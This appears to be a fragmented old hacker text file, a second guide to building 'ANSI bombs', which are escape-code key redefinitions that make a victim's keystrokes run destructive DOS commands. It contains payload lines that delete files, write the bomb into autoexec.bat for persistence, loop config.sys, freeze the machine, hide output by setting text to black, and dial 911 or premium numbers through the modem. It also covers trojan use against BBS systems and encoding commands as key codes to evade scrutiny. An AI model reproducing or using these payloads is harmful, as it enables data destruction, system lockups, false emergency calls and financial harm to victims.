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Bombs II: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aging Go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riting the last file, a lot of people let me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I had made.  I guess this file is to clear up those mi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ions and to let people know about some of the little trick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ing.  Of course, ANSI bombing isn't as dangerous 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ake it out to be, but bombs are still fun to make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lanning deliver some degree of success.  ANSI bomb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ngerous, so I am tired of hearing people say that an ANSI bo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another misconception I hope to clear up.  Now,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spent time experimenting with ANSI bombs probably kno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erial in this file, but it might be fun just to rea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scon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last file, I made three major blunders, or what I woul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o be major blunders.  First, I said that ANSI bomb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BBSs to screw people over, but I guess I was wrong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speculation on what other people had said that made me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, including those that redefine keys, are s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but most comm programs don't use ANSI.SYS; they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NSI, which doesn't support key redefinition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a program that supports it, but I haven't seen it y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sted bombs on systems on my own and proved to myself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.  I have also seen people fuck up bomb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by uploading them in a message.  The second miscon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SI bombs are dangerous when put into zips.  I hav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is out much, but from what I hear with the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you have to specify that you want to see ANSI com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.  It is unlikely that you would waste your time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gain after seeing "Format C:" in the middle of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 could be mistaken, but I'm pretty sure that I'm right.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that was a misconception is that VANSI.SYS wi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rom key redefinition.  Maybe the newer vers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key redefinition, but mine sure as hell does.  There a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out there that don't support it, but I don't know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Of course, if I were you, I would be wary about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ther then ANSI.  I have a few friends that are working on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SI" for PDers, which, instead of being better, really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n case you haven't read my other file (it's called ANSI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lame but fairly informative), I'll briefly go over the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an ANSI bomb.  Skip this part if you know what an ANSI bo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SI everything is done with a system of escape codes.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is one of those codes.  (From now, whenever I say ES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 the arrow, ).  Here is a basic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 [13;2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make the &lt;Enter&gt; key (13 is the code for enter)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&lt;Escape&gt; key (27 is the code for escape).  The  alway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, as do the bracket and the "p", but what i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and the "p" is up to you.  The first number is alway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be redefined.  If there is a zero for the firs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that means the key is in the extended set, and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numbers are the code.  The bracket signifie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inition, and the "p" signifies the end.  Whenever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, you have to use it's numerical code (i.e. 13 i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Enter&gt;).  You can't redefine strings, but you can redefin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string (i.e. ESC [13;"Blah"p would make &lt;Enter&gt;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h").  Strings must be inside of quotes, which includ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yped on the DOS prompt (i.e. ESC [13;"Del *.*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lete everything in the directory, note that 13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his case, not the redefinition).  An escape cod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ommands as you want in it, but each one has to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mi-colon.  You can only redefine one key in each escap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redefine another key, you have to sta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.  That's about it when it comes to bombs,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asics, all you really need is a little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Y/N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here's a simple but fun little ANSI bo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[78;89;13p ESC [110;121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all this does is turn a capital "N" into "Y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"n" into "y".  Alone this doesn't do too much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around with what they are typing.  On the other hand,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of code to the ANSI bo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[13;27;13;"del *.*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eople would automatically press "N" when they see "Del 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y do, they will be screwed over.  This portion of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 when it comes to making good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crewing with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other line of code that you may find useful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ng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[13;27;13;"copy bomb.ans c:\";13;"cop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autoexec.bat";13;"type bomb.ans";13;0;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;"cls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code makes the bomb a little more perman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dangerous.  It copies the bomb into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hange/creates the autoexec.bat, so the bomb is typ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oot-up.  Of course, the person could just boot off a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is would get them a few time.  It could als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though it were a virus, scaring the shit out of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urning Commands into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est pranks to do to someone using an ANSI bom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commands.  That way if they type in "copy", it will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*.*".  Since you can't actually change the whole string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different approach.  You have to change a few of th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typed, they type and execute the desired command. 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olest to have to command exactly the same length;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edefine one key at a time to obtain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really matter how you do it, just as long as it wor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an ANSI that says "Wow, check out what this bomb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", and then have it redefine the keys, so when th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dir", it turns into "del".  I think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Covering Your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kind of useful, if you don't want the bomb to re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has been set off.  Here's the command you can sti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, so that it will delete itself.  This is also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to think they've been hit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delete bomb.ans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make it look like a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echo You've been hit by the Big B Virus";13;"delete bomb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ne is a little more fun, but they both ge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Screwing with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^C";13;"copy con c:\config.sys";13;"device=config.sys";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;64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hange the config.sys, so when they reboot or you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, the computer will just freeze, and they won't know what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d.  The CONFIG.SYS will be caught in a loop, and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is by booting off a floppy.  Alone it works well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f you also freeze there computer, so they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Freez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reate a program with only � and � (ALT-250 and ALT-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eric keypad), then the computer will freeze and lock up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ne you can incorpo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^C";13;"copy con blah.com";13;"��";13;0;64;13;"blah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the necessary program and then run it,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nd forc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Hi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ing commands can serve two purposes.  First, they can fr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ut, making them think they're computer has frozen (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).  Second, they can hide the commands of the ANSI bom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useful with longer ANSI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^C";13;"command &gt;nul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ake it so all of the commands are invisi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ay the error messages (This doesn't work too well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mmands, so just use it alone as a single ANSI bo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the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^C";13;"prompt $e[0;30m";13;"cls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change the color of the text, so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ck ground.  Therefore, all other commands in the ANSI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dden, and the harm will be done before the victim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.  This is very helpful and highly recomm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your ANSI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Modem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re interesting things you can do with an ANSI bo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mmands directly to the modem from the DOS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have to guess on which port their modem is (most like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1 or COM2, but to be safe you can do them both). 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the command, then we will talk about some of the fu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13;"^C";13;"ECHO ATDT911&gt;COM1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ould call 911 through the COM1, but COM1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ny other com port, 911 can be replac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and ATDT can be replaced with any other mod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un comes in when you play around with th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911, which is fairly nasty in its own right,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D number or a 1-900 (especially those that charge a fla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or so, like the gambler's hotline type thing).  Not only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erson feel like a fool, but you could also make them a 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oorer.  When used in conjunction with the freeze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robably won't have enough time to turn off the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Troj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, everybody knows what a Trojan is.  You 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o, but ANSI bombs can be used as Trojans and in Trojan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on crashing a board, but you're not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then make yourself an ANSI bomb.  Try to fin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ory the main files for running the BBS are stor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under the name BBS or the name of the software, lik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egard.  Then, make a bomb that either just delet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, or if you want the board to be down a long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one that formats the Hard Drive.  In this form ANSI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well planned out, can be easy to make Trojans.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s can used in Trojans.  This is probably stretch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but say you wanted to write a Trojan that would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very time you typed a certain key, then you could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.  First make some batch and com/exe files that w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ecting programs like Norton and turn them off. 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into the root directory, along with you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config.sys, ANSI.sys, and whatever else.  (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more realistic make the files Resource.00x to trick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copying, use the real name).  Then somehow lock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 a warm boot through some pd program, which is easily a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When the computer loads back up, you can screw that sh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your ANSI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The Average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the average Joe is not going to know what the hell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n he sees all of the escape commands, if he looks at it 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support ANSI.  He will however be supicious if he sees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".  There is is a way to get rid of this.  Instead of re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be a text statement, redefine it as a bunch of keys that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LETE" = 100;101;108;101;116;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  E   L   E   T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MAT" = 102;111;114;109;97;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  O   R   M  A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, you can make destructive commands look like jus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.  Very few people will scrutinize an ANSI enough befo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ee the redefinition command.  This is very helpful and i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I recommend you always t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seem to some people that ANSI bombs are very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thers that they are stupid or lame.  Personally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s are just plain old fun.  They're not too hard to m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that you can do with them.  They are nowhere n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as virii, so if you're looking for unstoppable de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elsewhere, but they do serve their purpose.  I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s out there that help you program ANSI bomb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kind of take the fun out of them.  Probably, some day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quit making ANSI bombs and start looking more into virii and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s.  But for now, ANSI bombs suit m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: Key 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mall program, which I find very helpful. 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, it tells you the numeric code for every key you type in. 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means that it is in the extended set and therefore uses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ends the program.  Unfortunately,  I can't take any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 got it over the phone from Heavymetl, and i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brother.  So many thanks go out to Heavymetl and his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y'll probably be a little pissed at me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y file.  It is in Pascal and can be compiled in mos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 = #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CH,'(Special) - ',ORD(C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CH,' - ',ORD(C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'q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metl for giving me ideas.  Weapons Master for helping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ing me input.  And everyone who has helped m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ach me for some reason, just keep your ey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on some of the nets.  I'm not too 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